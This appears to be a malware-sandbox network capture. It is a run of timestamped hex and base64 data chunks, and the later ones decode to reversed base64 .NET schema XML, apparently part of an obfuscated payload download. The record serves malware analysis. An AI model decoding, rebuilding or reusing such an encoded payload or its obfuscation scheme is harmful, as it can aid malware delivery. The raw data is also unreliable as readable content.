                                                                            2023-03-21 08:11:06 UTC1986INData Raw: 59 77 47 51 4a 71 57 49 55 4f 45 5a 6c 34 66 4c 38 38 37 58 6f 54 71 63 70 45 32 4b 6c 68 45 72 70 30 42 77 4a 55 49 73 67 4b 52 71 53 69 64 32 66 64 55 74 4a 49 77 53 67 67 41 76 30 43 58 78 47 61 30 2f 52 56 71 62 72 6c 45 58 44 4a 70 34 47 50 64 6b 37 54 6c 56 77 30 51 57 76 4d 57 6a 62 6c 6d 70 6a 31 33 44 5a 6c 58 74 62 4c 74 34 52 74 52 6c 49 6b 63 64 4f 63 42 42 4c 73 46 47 41 73 6d 2f 5a 75 49 57 78 48 37 52 79 37 78 70 47 6c 72 4b 62 4d 78 36 53 78 70 75 6a 68 30 6c 43 2f 33 78 2b 4a 54 67 44 49 73 37 75 72 65 46 6c 6e 78 75 45 34 57 32 39 2b 39 58 6c 4d 6e 6d 4d 6a 70 79 48 66 7a 48 43 6a 4e 6d 50 34 6b 45 51 52 44 31 34 41 38 4d 4f 38 48 62 75 46 44 36 41 46 4c 66 65 58 4c 79 72 4a 78 64 53 42 4a 74 36 72 49 34 63 41 59 67 4b 53 68 4f 41 50 37
                                                                            Data Ascii: YwGQJqWIUOEZl4fL887XoTqcpE2KlhErp0BwJUIsgKRqSid2fdUtJIwSggAv0CXxGa0/RVqbrlEXDJp4GPdk7TlVw0QWvMWjblmpj13DZlXtbLt4RtRlIkcdOcBBLsFGAsm/ZuIWxH7Ry7xpGlrKbMx6Sxpujh0lC/3x+JTgDIs7ureFlnxuE4W29+9XlMnmMjpyHfzHCjNmP4kEQRD14A8MO8HbuFD6AFLfeXLyrJxdSBJt6rI4cAYgKShOAP7
                                                                            2023-03-21 08:11:06 UTC2002INData Raw: 2b 67 32 50 6e 4e 46 30 4d 2b 75 57 31 68 4c 4c 58 46 5a 70 65 34 4d 37 47 36 4e 76 51 53 41 35 69 4b 50 4c 39 45 71 74 55 51 63 7a 66 4c 42 64 48 43 49 35 76 6a 56 7a 55 48 63 53 56 42 64 65 46 44 44 74 75 6e 54 4d 2b 31 4f 2b 30 59 42 53 68 34 6d 47 45 7a 51 46 46 34 44 4b 55 30 4d 6a 6f 41 49 74 32 2f 33 6d 36 71 61 47 4e 2f 51 74 67 52 35 75 31 75 4b 70 55 4a 76 64 31 55 30 53 63 53 6f 71 71 6c 62 4c 72 31 78 43 6c 43 79 53 74 6b 4a 37 42 4f 67 42 49 51 75 56 58 6a 34 6b 78 32 63 32 70 7a 78 42 57 4a 30 4b 39 35 44 36 7a 48 69 62 44 74 77 52 2f 62 57 61 6f 78 70 71 51 2f 56 6e 74 7a 41 42 33 58 31 73 78 33 33 7a 39 37 75 4f 66 45 34 4f 6b 74 64 5a 6b 78 45 66 56 4a 32 4b 4d 79 32 53 41 45 48 72 53 56 35 44 75 7a 48 58 6c 75 32 64 4a 43 43 35 35 4e 68
                                                                            Data Ascii: +g2PnNF0M+uW1hLLXFZpe4M7G6NvQSA5iKPL9EqtUQczfLBdHCI5vjVzUHcSVBdeFDDtunTM+1O+0YBSh4mGEzQFF4DKU0MjoAIt2/3m6qaGN/QtgR5u1uKpUJvd1U0ScSoqqlbLr1xClCyStkJ7BOgBIQuVXj4kx2c2pzxBWJ0K95D6zHibDtwR/bWaoxpqQ/VntzAB3X1sx33z97uOfE4OktdZkxEfVJ2KMy2SAEHrSV5DuzHXlu2dJCC55Nh
                                                                            2023-03-21 08:11:06 UTC2018INData Raw: 66 6d 61 33 41 4c 77 6b 42 66 58 69 79 69 6a 63 30 42 38 56 47 45 59 69 37 45 57 2b 58 77 32 74 41 4a 77 33 75 78 2b 70 73 6d 59 49 78 6d 57 38 2f 52 36 53 51 63 4a 4b 50 31 42 58 46 6e 79 39 44 64 54 7a 36 79 64 6a 30 4d 37 4b 4b 55 41 4f 35 64 2b 2f 31 39 32 6c 2b 5a 30 6c 62 46 47 53 54 43 55 77 6f 4a 57 75 53 76 67 55 5a 58 4a 66 77 4c 43 53 69 6f 67 59 59 44 74 54 77 57 46 55 2b 42 4f 54 65 41 36 44 36 4e 79 6d 59 35 31 56 4e 62 44 71 6c 49 2f 4f 4c 34 6d 6d 55 76 65 5a 30 6f 30 64 76 76 54 49 34 35 6d 7a 6e 74 35 34 79 6b 51 50 43 36 32 66 53 6b 41 71 5a 75 4d 65 31 49 32 41 65 61 34 72 56 59 69 41 38 50 5a 7a 65 56 31 63 74 30 77 36 48 4a 58 4e 66 6b 33 36 74 46 37 2b 4e 55 76 39 36 6d 54 45 79 4f 73 50 64 6b 68 33 67 66 31 4b 4e 42 39 77 39 68 42
                                                                            Data Ascii: fma3ALwkBfXiyijc0B8VGEYi7EW+Xw2tAJw3ux+psmYIxmW8/R6SQcJKP1BXFny9DdTz6ydj0M7KKUAO5d+/192l+Z0lbFGSTCUwoJWuSvgUZXJfwLCSiogYYDtTwWFU+BOTeA6D6NymY51VNbDqlI/OL4mmUveZ0o0dvvTI45mznt54ykQPC62fSkAqZuMe1I2Aea4rVYiA8PZzeV1ct0w6HJXNfk36tF7+NUv96mTEyOsPdkh3gf1KNB9w9hB
                                                                            2023-03-21 08:11:06 UTC2034INData Raw: 65 56 54 30 52 50 6c 6c 4a 78 4c 6c 62 53 46 44 69 6c 62 35 66 32 6e 50 56 6b 59 30 62 32 55 2f 49 6b 33 50 71 43 52 72 39 5a 2f 33 4e 50 59 56 4b 2b 66 56 49 6b 52 70 2b 2b 43 54 46 75 6b 66 6b 52 57 6e 32 4d 52 76 32 55 30 77 78 54 67 6a 69 4f 74 6c 51 44 61 45 7a 64 57 45 61 6d 4e 57 61 34 30 53 69 64 49 53 76 4c 35 52 41 51 46 52 48 78 4f 65 58 4b 6e 47 32 4f 74 2f 73 54 51 47 67 2f 6f 70 47 6b 68 6f 4f 56 39 65 2f 59 36 4c 66 66 4f 42 6f 79 41 4a 53 6c 30 44 2f 59 73 49 52 66 56 44 6c 74 56 30 58 73 41 6c 43 79 4b 67 64 54 41 65 32 39 6f 53 64 4f 33 6e 44 55 59 32 74 4f 75 4f 55 6d 67 6f 69 59 45 36 47 2f 67 66 63 53 6b 6b 41 5a 63 64 58 55 62 47 6b 32 79 7a 6d 37 30 78 63 69 44 66 6d 41 2b 4d 7a 4b 4b 63 57 31 4c 5a 56 58 66 59 34 70 45 76 58 38 6a
                                                                            Data Ascii: eVT0RPllJxLlbSFDilb5f2nPVkY0b2U/Ik3PqCRr9Z/3NPYVK+fVIkRp++CTFukfkRWn2MRv2U0wxTgjiOtlQDaEzdWEamNWa40SidISvL5RAQFRHxOeXKnG2Ot/sTQGg/opGkhoOV9e/Y6LffOBoyAJSl0D/YsIRfVDltV0XsAlCyKgdTAe29oSdO3nDUY2tOuOUmgoiYE6G/gfcSkkAZcdXUbGk2yzm70xciDfmA+MzKKcW1LZVXfY4pEvX8j
                                                                            2023-03-21 08:11:06 UTC2050INData Raw: 4b 55 67 30 6b 36 51 6f 76 4e 42 64 2b 35 6b 4b 4f 39 4c 61 5a 35 53 55 37 4f 68 7a 54 34 31 66 78 58 58 77 45 53 46 63 61 6b 55 49 52 44 6e 36 33 6b 4b 7a 61 4a 65 4f 74 33 51 79 41 36 33 35 56 57 41 6e 31 45 34 49 69 55 70 4c 46 50 55 41 76 44 69 58 45 30 70 73 6a 39 70 71 52 69 55 32 6e 66 74 48 4d 63 51 61 44 71 42 72 75 6f 55 55 2b 7a 46 75 72 6e 68 38 63 47 6c 2b 69 42 79 7a 34 65 6d 6e 4c 44 43 4b 73 75 34 35 78 45 43 63 78 69 47 74 4e 78 77 47 4b 33 6a 59 44 75 7a 55 36 6a 76 61 53 61 57 4e 35 31 66 44 75 5a 36 55 39 78 44 34 50 54 62 49 5a 67 4a 52 5a 48 61 2b 6a 4f 39 4a 44 54 43 6e 67 2f 4c 62 70 31 42 37 57 50 79 34 6b 50 70 44 4a 55 48 4c 34 58 6e 55 71 74 77 37 38 75 2f 76 74 79 35 43 39 30 36 6c 4a 59 74 66 71 32 39 59 63 79 43 47 32 77 2f
                                                                            Data Ascii: KUg0k6QovNBd+5kKO9LaZ5SU7OhzT41fxXXwESFcakUIRDn63kKzaJeOt3QyA635VWAn1E4IiUpLFPUAvDiXE0psj9pqRiU2nftHMcQaDqBruoUU+zFurnh8cGl+iByz4emnLDCKsu45xECcxiGtNxwGK3jYDuzU6jvaSaWN51fDuZ6U9xD4PTbIZgJRZHa+jO9JDTCng/Lbp1B7WPy4kPpDJUHL4XnUqtw78u/vty5C906lJYtfq29YcyCG2w/
                                                                            2023-03-21 08:11:06 UTC2066INData Raw: 2f 69 55 36 6a 55 59 57 39 6a 68 38 75 75 30 38 50 32 69 55 48 5a 63 51 6e 4e 54 6f 42 54 43 70 79 67 45 41 38 71 49 61 76 69 39 55 34 43 56 51 53 72 71 58 39 56 59 75 56 57 38 5a 48 54 4d 54 5a 37 72 68 33 6f 58 2b 58 35 2b 78 45 71 65 56 6f 47 63 52 53 6c 2f 67 71 70 68 49 41 66 64 43 65 62 49 65 79 57 59 62 42 4d 50 59 70 42 6f 68 68 6f 30 6c 61 78 45 63 42 42 6e 66 34 36 46 4a 69 58 6e 4d 72 62 50 39 30 46 47 66 6a 64 69 41 38 66 56 46 30 68 37 68 72 35 61 43 53 62 76 5a 45 62 66 65 59 32 58 67 30 72 7a 72 49 77 37 50 41 57 34 49 65 64 32 64 78 32 4e 30 2b 74 4c 74 6e 50 58 6a 33 47 2f 75 6d 76 66 6c 71 72 2f 51 61 2b 33 71 43 57 46 72 44 51 4f 48 5a 50 66 45 31 2f 39 42 6a 54 2b 2b 35 71 4b 71 66 51 65 66 74 43 42 37 73 43 2f 41 6f 65 37 4b 37 37 6f
                                                                            Data Ascii: /iU6jUYW9jh8uu08P2iUHZcQnNToBTCpygEA8qIavi9U4CVQSrqX9VYuVW8ZHTMTZ7rh3oX+X5+xEqeVoGcRSl/gqphIAfdCebIeyWYbBMPYpBohho0laxEcBBnf46FJiXnMrbP90FGfjdiA8fVF0h7hr5aCSbvZEbfeY2Xg0rzrIw7PAW4Ied2dx2N0+tLtnPXj3G/umvflqr/Qa+3qCWFrDQOHZPfE1/9BjT++5qKqfQeftCB7sC/Aoe7K77o
                                                                            2023-03-21 08:11:06 UTC2082INData Raw: 76 57 73 30 6d 55 56 6f 33 68 48 72 77 33 72 50 79 6e 42 67 46 55 6c 70 6d 30 54 41 33 4b 6f 74 35 66 36 37 42 7a 66 47 46 71 49 72 63 6d 6f 35 79 79 47 66 76 49 59 72 57 38 33 77 49 50 76 35 45 58 37 76 31 7a 48 69 50 4a 44 55 6c 38 32 2f 33 54 44 50 33 78 6e 4e 51 71 55 4f 54 5a 65 77 66 62 78 30 58 4c 30 72 4c 34 67 72 4d 45 37 37 4d 63 35 42 71 30 71 4e 6d 4b 53 63 38 4e 2f 4f 75 36 70 71 4a 76 49 44 34 45 36 43 50 78 74 78 6c 61 57 4d 43 77 62 48 58 77 45 44 6d 76 64 37 66 67 42 37 53 48 4f 47 45 6c 55 73 32 59 6d 46 79 75 4b 4a 4f 45 6b 64 6a 6a 68 57 6c 7a 58 6b 4a 67 2b 43 4e 34 54 5a 63 43 4d 47 54 65 6a 47 66 64 74 54 6c 63 30 74 42 33 6d 4e 56 32 47 41 42 51 68 75 75 55 47 79 48 56 59 76 7a 64 4d 6b 36 53 4e 44 70 6b 4a 51 6a 46 77 30 6f 32 36
                                                                            Data Ascii: vWs0mUVo3hHrw3rPynBgFUlpm0TA3Kot5f67BzfGFqIrcmo5yyGfvIYrW83wIPv5EX7v1zHiPJDUl82/3TDP3xnNQqUOTZewfbx0XL0rL4grME77Mc5Bq0qNmKSc8N/Ou6pqJvID4E6CPxtxlaWMCwbHXwEDmvd7fgB7SHOGElUs2YmFyuKJOEkdjjhWlzXkJg+CN4TZcCMGTejGfdtTlc0tB3mNV2GABQhuuUGyHVYvzdMk6SNDpkJQjFw0o26
                                                                            2023-03-21 08:11:06 UTC2098INData Raw: 72 51 49 6e 74 35 41 55 63 58 31 73 59 74 76 57 50 79 32 79 58 54 77 6d 36 69 34 5a 70 6a 36 55 52 6f 4d 66 6e 30 31 49 57 61 45 64 6f 48 71 57 2b 52 69 55 47 79 6c 6f 54 70 65 32 6f 63 7a 34 66 68 46 48 77 68 70 6d 67 6f 72 58 65 4b 50 67 75 78 45 4d 42 43 61 45 74 2f 71 47 64 52 42 5a 45 4e 47 6e 6a 32 70 51 33 71 4d 69 55 42 66 58 36 7a 38 33 48 4d 6b 31 46 36 4e 6e 70 35 46 4d 42 64 34 4b 2b 77 56 59 33 70 59 30 75 4b 46 71 64 42 37 63 57 65 75 66 62 2b 51 4c 71 4b 58 77 38 2b 5a 4e 46 34 6e 73 76 6f 72 33 36 45 77 59 58 67 39 57 4a 61 31 58 48 54 6b 52 4a 39 79 57 57 61 49 47 62 32 6f 32 6c 46 4d 70 4b 62 7a 59 65 4d 51 6a 39 42 2b 77 62 31 71 59 59 6c 30 6d 45 70 32 70 7a 4c 63 78 53 79 33 66 2f 4a 4d 46 6d 4a 30 55 78 32 72 74 6e 5a 37 79 33 57 78
                                                                            Data Ascii: rQInt5AUcX1sYtvWPy2yXTwm6i4Zpj6URoMfn01IWaEdoHqW+RiUGyloTpe2ocz4fhFHwhpmgorXeKPguxEMBCaEt/qGdRBZENGnj2pQ3qMiUBfX6z83HMk1F6Nnp5FMBd4K+wVY3pY0uKFqdB7cWeufb+QLqKXw8+ZNF4nsvor36EwYXg9WJa1XHTkRJ9yWWaIGb2o2lFMpKbzYeMQj9B+wb1qYYl0mEp2pzLcxSy3f/JMFmJ0Ux2rtnZ7y3Wx
                                                                            2023-03-21 08:11:06 UTC2114INData Raw: 67 44 6a 30 4a 31 4a 75 6c 5a 54 75 62 61 64 34 57 6a 44 50 49 67 56 37 6e 4a 4d 77 59 6b 77 70 5a 4d 4e 66 76 36 52 71 4c 57 33 5a 66 6a 2b 59 57 62 4f 66 57 6b 4d 56 6b 36 69 74 6c 33 31 6e 35 53 68 4f 78 66 69 75 74 37 42 4e 62 38 35 53 6d 61 6d 66 71 34 4d 4c 46 77 61 38 51 4a 59 6f 30 6b 73 65 65 46 73 77 57 62 34 72 79 34 48 48 65 4d 63 45 32 68 63 6a 4e 34 78 71 77 2b 42 65 6e 49 58 7a 6c 79 75 64 47 41 2b 45 66 43 52 52 52 71 66 63 5a 38 4d 32 58 33 2b 72 35 6f 52 43 37 6d 48 75 34 51 39 47 4c 64 68 39 76 71 6e 6b 50 31 79 2f 47 2b 50 61 6d 4b 68 71 79 64 4c 63 68 33 34 72 34 50 50 69 77 31 48 6a 6c 65 4a 4a 42 77 52 41 52 6c 64 57 35 31 36 74 38 37 71 39 37 39 44 39 6a 54 41 65 43 43 43 6c 4f 4f 72 35 43 78 44 65 6b 73 43 41 62 72 33 30 38 67 6d
                                                                            Data Ascii: gDj0J1JulZTubad4WjDPIgV7nJMwYkwpZMNfv6RqLW3Zfj+YWbOfWkMVk6itl31n5ShOxfiut7BNb85Smamfq4MLFwa8QJYo0kseeFswWb4ry4HHeMcE2hcjN4xqw+BenIXzlyudGA+EfCRRRqfcZ8M2X3+r5oRC7mHu4Q9GLdh9vqnkP1y/G+PamKhqydLch34r4PPiw1HjleJJBwRARldW516t87q979D9jTAeCCClOOr5CxDeksCAbr308gm
                                                                            2023-03-21 08:11:06 UTC2130INData Raw: 48 63 57 7a 71 66 6f 71 62 4a 76 4a 77 70 59 62 32 5a 4e 74 65 6a 2f 2b 57 32 74 78 45 43 78 4b 53 37 44 58 57 76 30 69 6a 67 6f 65 75 31 78 47 47 2f 43 75 5a 4d 71 43 46 54 51 52 63 69 48 32 70 67 77 6b 52 62 2b 50 42 31 6c 46 6b 53 39 31 71 63 6b 59 2f 56 55 38 2f 64 54 38 6a 6d 52 52 69 4f 4b 42 58 76 52 52 31 63 36 58 56 44 34 6f 4d 6a 56 42 4c 4c 77 4e 57 30 75 4c 31 53 69 6d 66 42 77 50 4e 50 68 69 38 58 70 4e 47 65 65 74 55 4d 74 4d 6d 49 67 4b 57 4d 74 37 36 4a 44 46 35 4c 74 56 44 32 66 74 50 4b 31 64 38 42 69 68 4c 71 44 37 54 54 31 37 33 2f 56 71 56 33 63 48 30 38 38 32 37 4a 59 31 4f 48 62 37 62 41 77 53 52 73 37 67 4c 4b 7a 59 64 4d 63 4b 4f 55 47 7a 45 74 39 33 7a 7a 51 4c 7a 69 30 5a 45 55 4d 75 36 69 72 52 6a 7a 2b 33 48 43 61 69 49 47 58
                                                                            Data Ascii: HcWzqfoqbJvJwpYb2ZNtej/+W2txECxKS7DXWv0ijgoeu1xGG/CuZMqCFTQRciH2pgwkRb+PB1lFkS91qckY/VU8/dT8jmRRiOKBXvRR1c6XVD4oMjVBLLwNW0uL1SimfBwPNPhi8XpNGeetUMtMmIgKWMt76JDF5LtVD2ftPK1d8BihLqD7TT173/VqV3cH08827JY1OHb7bAwSRs7gLKzYdMcKOUGzEt93zzQLzi0ZEUMu6irRjz+3HCaiIGX
                                                                            2023-03-21 08:11:06 UTC2146INData Raw: 32 34 34 62 4c 32 52 77 47 77 6a 4a 48 6b 69 6f 36 37 64 55 7a 5a 37 6c 57 30 52 62 4e 38 65 46 64 43 46 76 74 64 68 6e 48 70 37 2f 35 4a 55 47 39 42 76 54 69 67 43 46 33 4e 37 48 52 43 2f 45 50 6f 75 6d 36 64 6e 36 4d 34 6d 30 30 59 31 50 47 63 4a 73 31 62 36 31 46 6f 2b 70 39 57 53 6c 7a 64 69 65 68 47 72 66 43 76 55 4d 38 75 42 62 52 6c 4d 39 54 4b 57 44 77 6a 31 48 6d 41 75 33 45 4f 68 4a 45 73 38 71 4b 56 35 68 67 39 4e 75 39 4f 6e 68 2b 69 63 4c 50 67 31 75 45 4c 36 31 4e 64 44 69 37 57 4a 66 30 6b 75 4b 4a 2f 75 37 66 42 38 36 65 58 56 69 45 54 35 48 35 39 6a 76 5a 44 4c 56 6b 6d 61 66 39 74 6a 55 7a 68 76 76 57 65 47 63 43 50 70 4d 43 6f 6c 45 66 36 43 6a 61 48 4b 50 71 35 33 67 56 66 49 45 59 4a 36 75 41 50 2f 50 54 78 32 61 46 6e 70 31 4e 65 46
                                                                            Data Ascii: 244bL2RwGwjJHkio67dUzZ7lW0RbN8eFdCFvtdhnHp7/5JUG9BvTigCF3N7HRC/EPoum6dn6M4m00Y1PGcJs1b61Fo+p9WSlzdiehGrfCvUM8uBbRlM9TKWDwj1HmAu3EOhJEs8qKV5hg9Nu9Onh+icLPg1uEL61NdDi7WJf0kuKJ/u7fB86eXViET5H59jvZDLVkmaf9tjUzhvvWeGcCPpMColEf6CjaHKPq53gVfIEYJ6uAP/PTx2aFnp1NeF
                                                                            2023-03-21 08:11:06 UTC2162INData Raw: 78 45 36 34 51 51 76 6f 54 63 53 39 74 36 30 65 4a 41 39 5a 50 53 5a 45 4c 6f 43 2f 78 64 74 55 61 42 37 47 52 49 35 65 48 33 6a 6c 74 4b 44 4e 73 38 4d 35 34 30 7a 4a 6b 6f 4a 50 56 51 42 45 30 51 71 41 55 51 47 35 43 34 4d 4d 6b 4f 75 30 6b 30 4c 4d 66 6a 48 72 47 77 41 49 6d 67 73 36 66 50 76 54 55 6f 33 38 4b 42 6e 7a 59 4e 6e 59 2f 49 65 73 2f 45 70 30 53 72 6a 54 63 35 6e 57 70 2b 4d 35 6b 32 72 38 35 64 38 35 44 50 4f 54 31 45 6d 35 43 58 53 49 51 35 7a 56 6b 31 2f 35 6d 77 52 6c 52 4a 32 69 68 31 4c 63 6e 56 45 5a 67 47 6d 5a 47 31 51 75 73 55 41 33 6e 77 51 7a 64 67 55 57 42 37 67 56 7a 4f 78 4d 4d 4e 43 54 48 39 32 66 50 38 54 73 57 6e 67 50 6c 53 67 47 41 77 76 31 54 6c 73 2b 68 6b 2b 35 44 35 2f 6c 43 6c 55 78 62 75 68 5a 6a 70 4e 6d 73 78 31
                                                                            Data Ascii: xE64QQvoTcS9t60eJA9ZPSZELoC/xdtUaB7GRI5eH3jltKDNs8M540zJkoJPVQBE0QqAUQG5C4MMkOu0k0LMfjHrGwAImgs6fPvTUo38KBnzYNnY/Ies/Ep0SrjTc5nWp+M5k2r85d85DPOT1Em5CXSIQ5zVk1/5mwRlRJ2ih1LcnVEZgGmZG1QusUA3nwQzdgUWB7gVzOxMMNCTH92fP8TsWngPlSgGAwv1Tls+hk+5D5/lClUxbuhZjpNmsx1
                                                                            2023-03-21 08:11:06 UTC2178INData Raw: 66 64 76 38 56 4f 4b 51 70 62 44 70 76 77 6a 6e 4a 41 74 2b 77 77 70 38 6e 48 6a 2f 48 4d 61 2b 6b 65 46 67 67 4b 44 47 62 35 70 30 2f 69 30 70 6f 45 63 72 59 69 43 55 4c 4c 45 37 6d 6b 39 4d 4a 38 58 42 4f 74 57 55 4f 35 30 53 50 7a 6c 37 6c 63 47 71 64 39 33 62 6a 44 6f 57 41 55 4f 4a 53 32 59 5a 54 32 54 57 41 38 46 4d 6f 73 4b 75 31 59 46 2f 4f 4b 2b 4f 63 5a 76 51 2f 7a 34 4a 37 33 34 52 47 4d 70 30 6d 41 56 77 4d 71 6b 48 72 79 4b 5a 67 79 6d 47 45 44 36 2f 59 74 75 47 31 61 72 49 65 46 32 4c 51 6d 75 66 65 4d 46 41 69 53 6a 6b 46 51 31 62 36 63 69 39 6f 4c 43 76 32 79 6e 4f 63 55 46 77 43 41 49 47 42 75 73 54 5a 39 6d 31 78 51 68 38 47 51 44 6a 37 42 77 6f 56 46 68 69 41 71 66 6d 4e 74 57 73 47 6d 53 78 70 30 70 43 53 66 59 64 54 65 6f 42 6d 58 45
                                                                            Data Ascii: fdv8VOKQpbDpvwjnJAt+wwp8nHj/HMa+keFggKDGb5p0/i0poEcrYiCULLE7mk9MJ8XBOtWUO50SPzl7lcGqd93bjDoWAUOJS2YZT2TWA8FMosKu1YF/OK+OcZvQ/z4J734RGMp0mAVwMqkHryKZgymGED6/YtuG1arIeF2LQmufeMFAiSjkFQ1b6ci9oLCv2ynOcUFwCAIGBusTZ9m1xQh8GQDj7BwoVFhiAqfmNtWsGmSxp0pCSfYdTeoBmXE
                                                                            2023-03-21 08:11:06 UTC2194INData Raw: 59 78 56 33 74 47 79 4c 42 65 33 63 36 4a 67 53 5a 46 2b 55 68 50 6a 55 58 54 52 4e 2b 78 44 70 5a 43 2f 43 44 38 65 76 55 70 73 57 66 4a 6d 45 64 54 73 76 45 44 69 64 2b 42 75 36 48 52 73 36 42 65 64 6e 79 2f 57 71 43 33 64 63 57 35 37 74 47 49 7a 59 48 68 37 54 50 79 38 46 46 58 39 45 54 37 57 41 42 48 68 41 39 79 50 78 63 39 74 37 65 6a 73 6c 36 63 37 46 74 31 74 74 2b 6e 35 76 55 45 78 39 66 57 5a 75 4a 38 52 36 76 6a 55 45 33 62 5a 76 48 4b 33 77 32 35 63 69 54 63 41 68 35 42 6e 77 39 30 6c 49 57 64 42 52 62 31 31 41 77 54 2b 4d 6a 4d 45 72 67 4f 53 7a 4d 35 4d 6b 6b 4a 44 55 58 30 73 4b 68 61 74 38 66 65 45 6e 6a 46 63 52 32 62 61 5a 65 76 64 68 4e 34 73 65 56 49 6e 38 67 6c 65 59 4b 42 30 71 4c 72 2f 47 41 44 59 75 6e 75 75 5a 55 55 30 42 4e 76 73
                                                                            Data Ascii: YxV3tGyLBe3c6JgSZF+UhPjUXTRN+xDpZC/CD8evUpsWfJmEdTsvEDid+Bu6HRs6Bedny/WqC3dcW57tGIzYHh7TPy8FFX9ET7WABHhA9yPxc9t7ejsl6c7Ft1tt+n5vUEx9fWZuJ8R6vjUE3bZvHK3w25ciTcAh5Bnw90lIWdBRb11AwT+MjMErgOSzM5MkkJDUX0sKhat8feEnjFcR2baZevdhN4seVIn8gleYKB0qLr/GADYunuuZUU0BNvs
                                                                            2023-03-21 08:11:06 UTC2210INData Raw: 57 5a 6c 63 6c 42 73 59 58 4a 6c 64 47 6c 4d 4c 7a 77 6e 50 6e 68 70 5a 6d 56 79 55 47 78 68 63 6d 56 30 61 55 77 38 49 43 41 67 49 41 6f 4e 50 6d 56 72 61 55 78 6f 64 47 6c 58 5a 57 78 69 59 57 68 6a 63 6d 46 6c 55 33 4e 4a 4c 7a 78 6c 64 58 4a 30 50 6d 56 72 61 55 78 6f 64 47 6c 58 5a 57 78 69 59 57 68 6a 63 6d 46 6c 55 33 4e 4a 50 43 41 67 49 43 41 4b 44 54 35 6c 62 47 4a 68 61 47 4e 79 59 57 56 54 63 30 6b 76 50 47 56 31 63 6e 51 2b 5a 57 78 69 59 57 68 6a 63 6d 46 6c 55 33 4e 4a 50 43 41 67 49 43 41 4b 44 54 35 6c 62 47 4a 68 62 47 78 31 54 6e 4e 4a 4c 7a 78 6c 64 58 4a 30 50 6d 56 73 59 6d 46 73 62 48 56 4f 63 30 6b 38 49 43 41 67 49 41 6f 4e 50 6d 64 75 62 30 78 7a 53 53 38 38 5a 58 4e 73 59 57 59 2b 5a 32 35 76 54 48 4e 4a 50 43 41 67 49 43 41 4b
                                                                            Data Ascii: WZlclBsYXJldGlMLzwnPnhpZmVyUGxhcmV0aUw8ICAgIAoNPmVraUxodGlXZWxiYWhjcmFlU3NJLzxldXJ0PmVraUxodGlXZWxiYWhjcmFlU3NJPCAgICAKDT5lbGJhaGNyYWVTc0kvPGV1cnQ+ZWxiYWhjcmFlU3NJPCAgICAKDT5lbGJhbGx1TnNJLzxldXJ0PmVsYmFsbHVOc0k8ICAgIAoNPmdub0xzSS88ZXNsYWY+Z25vTHNJPCAgICAK
                                                                            2023-03-21 08:11:06 UTC2226INData Raw: 55 35 7a 53 53 38 38 5a 58 56 79 64 44 35 6c 62 47 4a 68 62 47 78 31 54 6e 4e 4a 50 43 41 67 49 43 41 4b 44 54 35 6e 62 6d 39 4d 63 30 6b 76 50 47 56 7a 62 47 46 6d 50 6d 64 75 62 30 78 7a 53 54 77 67 49 43 41 67 43 67 30 2b 5a 57 78 68 59 31 4e 75 62 32 6c 7a 61 57 4e 6c 63 6c 42 6b 5a 58 68 70 52 6e 4e 4a 4c 7a 78 6c 64 58 4a 30 50 6d 56 73 59 57 4e 54 62 6d 39 70 63 32 6c 6a 5a 58 4a 51 5a 47 56 34 61 55 5a 7a 53 54 77 67 49 43 41 67 43 67 30 2b 61 48 52 6e 62 6d 56 4d 5a 47 56 34 61 55 5a 7a 53 53 38 38 5a 58 56 79 64 44 35 6f 64 47 64 75 5a 55 78 6b 5a 58 68 70 52 6e 4e 4a 50 43 41 67 49 43 41 4b 44 54 35 6c 64 6d 6c 30 61 58 4e 75 5a 56 4e 6c 63 32 46 44 63 30 6b 76 50 47 56 7a 62 47 46 6d 50 6d 56 32 61 58 52 70 63 32 35 6c 55 32 56 7a 59 55 4e 7a
                                                                            Data Ascii: U5zSS88ZXVydD5lbGJhbGx1TnNJPCAgICAKDT5nbm9Mc0kvPGVzbGFmPmdub0xzSTwgICAgCg0+ZWxhY1Nub2lzaWNlclBkZXhpRnNJLzxldXJ0PmVsYWNTbm9pc2ljZXJQZGV4aUZzSTwgICAgCg0+aHRnbmVMZGV4aUZzSS88ZXVydD5odGduZUxkZXhpRnNJPCAgICAKDT5ldml0aXNuZVNlc2FDc0kvPGVzbGFmPmV2aXRpc25lU2VzYUNz
                                                                            2023-03-21 08:11:06 UTC2242INData Raw: 41 6f 4e 50 6d 56 32 61 58 52 70 63 32 35 6c 55 32 56 7a 59 55 4e 7a 53 53 38 38 5a 58 4e 73 59 57 59 2b 5a 58 5a 70 64 47 6c 7a 62 6d 56 54 5a 58 4e 68 51 33 4e 4a 50 43 41 67 49 43 41 4b 44 54 35 6c 62 47 4a 68 64 47 35 6c 62 57 56 79 59 32 35 4a 62 33 52 31 51 58 4e 4a 4c 7a 78 6c 63 32 78 68 5a 6a 35 6c 62 47 4a 68 64 47 35 6c 62 57 56 79 59 32 35 4a 62 33 52 31 51 58 4e 4a 50 43 41 67 49 43 41 4b 44 54 35 30 59 57 31 79 62 30 5a 6c 64 47 46 6c 63 6b 4d 76 50 48 52 75 61 57 78 73 59 57 31 7a 50 6e 52 68 62 58 4a 76 52 6d 56 30 59 57 56 79 51 7a 77 67 49 43 41 67 43 67 30 2b 5a 58 42 35 56 47 46 30 59 55 51 76 50 44 59 78 64 47 35 4a 4c 6d 31 6c 64 48 4e 35 55 7a 35 6c 63 48 6c 55 59 58 52 68 52 44 77 67 49 43 41 67 43 67 30 2b 5a 58 70 70 55 32 35 74
                                                                            Data Ascii: AoNPmV2aXRpc25lU2VzYUNzSS88ZXNsYWY+ZXZpdGlzbmVTZXNhQ3NJPCAgICAKDT5lbGJhdG5lbWVyY25Jb3R1QXNJLzxlc2xhZj5lbGJhdG5lbWVyY25Jb3R1QXNJPCAgICAKDT50YW1yb0ZldGFlckMvPHRuaWxsYW1zPnRhbXJvRmV0YWVyQzwgICAgCg0+ZXB5VGF0YUQvPDYxdG5JLm1ldHN5Uz5lcHlUYXRhRDwgICAgCg0+ZXppU25t
